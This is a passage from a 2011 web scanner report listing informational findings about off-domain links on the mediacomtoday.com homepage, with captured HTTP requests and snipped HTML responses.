Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134948
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=18" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;62dcd259;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;688e01fd;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/28.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.30. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=12 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313364158392; dslv=1313364158393; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 23:51:08 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135207
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=13" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;62dcd259;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;688e01fd;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/28.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.mediacomcable.com/internet_security.html" title="CA Internet Security"><img src="/cmsimages/CA_promo.jpg" alt="CA Internet Security" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.31. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=8 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313357176985; dslv=1313357176986; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 21:54:58 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135724
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=9" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;953e5231;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;f5a8cb38;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/30.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.americanwebinc.com/AW_Flip_Books/Pause/Issue_15/index.html" title="Pause"><img src="/cmsimages/Pause_promo.jpg" alt="Pause" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.32. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=13 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313365903940; dslv=1313365903941; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 00:20:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135073
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=14" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;adb82fa9;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;4331bba4;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/28.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.33. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=24 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=23
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313385104988; dslv=1313385104988; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 05:40:12 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 133587
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=25" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;9a84b3f3;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;0a720b96;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
